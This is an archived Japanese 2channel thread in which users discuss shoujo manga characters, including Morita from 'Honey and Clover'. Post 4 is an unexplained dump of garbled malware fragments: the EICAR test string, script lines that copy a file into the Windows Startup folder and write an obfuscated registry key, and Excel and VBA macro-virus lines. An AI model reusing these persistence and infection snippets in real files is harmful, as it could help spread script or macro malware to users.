2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

*0の決めた少女漫画のキャラで盛り上がるスレその4

1 :花と名無しさん:2007/11/12(月) 17:42:20 ID:???0
0が親として語り合うキャラクター(少女漫画限定)を決めます。
次の親の番が来るまで、そのキャラクタ−について語り合いましょう。

スレの最初の親はレス番号10を採用。
以下、20・30・40・・・と続きます。

*0が少女漫画のキャラクターと関係無いものや、既出の場合は親の一つ後のレス番号を採用します。
■同一スレ内で同じ作品のキャラは禁止
■*0はage推奨
■*0に書き込む前に、必ずスレ内を検索して確かめること
■まとめはなるべくレスの少なそうな時に、出来る人がやって下さい
■次スレは>>980を取った人がたてる。その場合>>1000まで同一キャラでまわして下さい
■知らないお題で書くことがない場合は、無駄な書き込みをせずスルーでお願いします。

【前スレ】
*0の決めた少女漫画のキャラで盛り上がるスレ その3
http://anime2.2ch.net/test/read.cgi/gcomic/1159174773/



【過去スレ】
*00の決めた少女漫画の主人公で盛り上がるスレ
http://comic6.2ch.net/test/read.cgi/gcomic/1082212480/
*0の決めた少女漫画のキャラで盛り上がるスレ その2
http://comic6.2ch.net/test/read.cgi/gcomic/1138613083/


では>>10のあげたキャラクターからスタート!

2 :前スレ980:2007/11/12(月) 17:44:19 ID:???0
スレ立てブッチしててすみませんでした。
さっき980踏んだ事に気づき、スレ立てしたんですが
前スレがdat落ちしてしまいました。ごめんなさい。

3 :花と名無しさん:2007/11/12(月) 18:06:17 ID:???0
>>1


4 :花と名無しさん:2007/11/12(月) 18:11:21 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


5 :花と名無しさん:2007/11/12(月) 19:49:56 ID:???0
>>1乙。
正直、「知らない」とか「次ドゾー」でレスが埋まるのが嫌だ。
かと言って、お題によっては過疎ってしまうからなぁ…。

6 :花と名無しさん:2007/11/12(月) 22:17:32 ID:???0
>>1
スレ立て乙です。
前スレ落ちててびっくりした。

7 :花と名無しさん:2007/11/13(火) 02:05:33 ID:???O
>>1
スレタイ通り盛り上がれるといいね

8 :花と名無しさん:2007/11/13(火) 10:43:47 ID:???0
1〜9じゃ語り尽せない時もある





9 :花と名無しさん:2007/11/13(火) 19:00:23 ID:???O
>>1乙です。

逆に2〜3レスで終了ってのもあるかなぁ

10 :花と名無しさん:2007/11/13(火) 19:05:42 ID:???O
ドラマ化記念
「ハチミツとクローバー」の森田

11 :花と名無しさん:2007/11/13(火) 19:57:05 ID:???0
まさか振られるとは思わなかった

12 :花と名無しさん:2007/11/13(火) 20:21:32 ID:???0
アニメ版は好きだな

13 :花と名無しさん:2007/11/14(水) 03:04:24 ID:???O
映画すごい心配してたけど、伊勢谷友介はまってた。

兄思いな所がいい。

14 :花と名無しさん:2007/11/14(水) 10:23:11 ID:???O
私もけっこう映画の森田さん好き

くっつかない展開も覚悟してたけどまさか修ちゃんに持ってかれるとは…

15 :花と名無しさん:2007/11/16(金) 20:50:08 ID:???O
面白いけど遠くで見てたいタイプ
近くには絶対いてほしくないw

16 :花と名無しさん:2007/11/17(土) 10:52:20 ID:???0
山田とくっつくのかと疑った時期もある

17 :花と名無しさん:2007/11/17(土) 11:13:44 ID:???O
むしろ山田とくっついてほしかった

18 :花と名無しさん:2007/11/17(土) 15:57:52 ID:???O
山田とのフラグととれる描写微妙にあったよね
正直期待してた時期もありましたorz
野宮も好きだからいいけど

19 :花と名無しさん:2007/11/17(土) 17:50:44 ID:???O
ハチクロで一番好きだ
メチャクチャなのに実はしっかり者のとこが(・∀・)イイ!!

20 :花と名無しさん:2007/11/18(日) 03:25:52 ID:???0
十二秘色のパレット
グエル先生

21 :花と名無しさん:2007/11/18(日) 13:18:07 ID:???0
鳥は可愛い♪

22 :花と名無しさん:2007/11/24(土) 00:58:02 ID:???0
保守

23 :花と名無しさん:2007/11/24(土) 01:39:13 ID:???0
あの二人はくっつくの?

24 :花と名無しさん:2007/11/24(土) 02:03:17 ID:???O
>>21
ちょwキャラについて語ってないww

結構いい歳なのに純情な先生モエス
この漫画の真のヒロインだと思う

25 :花と名無しさん:2007/11/24(土) 09:58:52 ID:???0
最初クールかと思ったら
恋心自覚していい感じで崩れていった

26 :花と名無しさん:2007/11/25(日) 07:35:15 ID:???O
やる時はやってくれるというか、頼りになる人
テオくんとの絡みがおもろいw

27 :花と名無しさん:2007/11/28(水) 15:38:37 ID:???O
七三姿、あれはあれでいいんじゃないでしょうか

28 :花と名無しさん:2007/12/03(月) 19:40:33 ID:???O


29 :花と名無しさん:2007/12/03(月) 23:59:24 ID:???O
セロを雪国に連れていく約束は新婚旅行になるといいなー

次どうぞ↓

30 :花と名無しさん:2007/12/04(火) 00:19:09 ID:???O
樹なつみ「花咲ける青少年」の立人

31 :花と名無しさん:2007/12/04(火) 00:21:20 ID:???0
人気らしいけど、何か地味な印象。
話が一番盛り上がるところで、あまり絡まなかったせいだろうか。

32 :花と名無しさん:2007/12/04(火) 00:56:08 ID:???0
めちゃくちゃはまった覚えがある
美形でヘタレな男がしばらく自分の中でブームになった

7 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)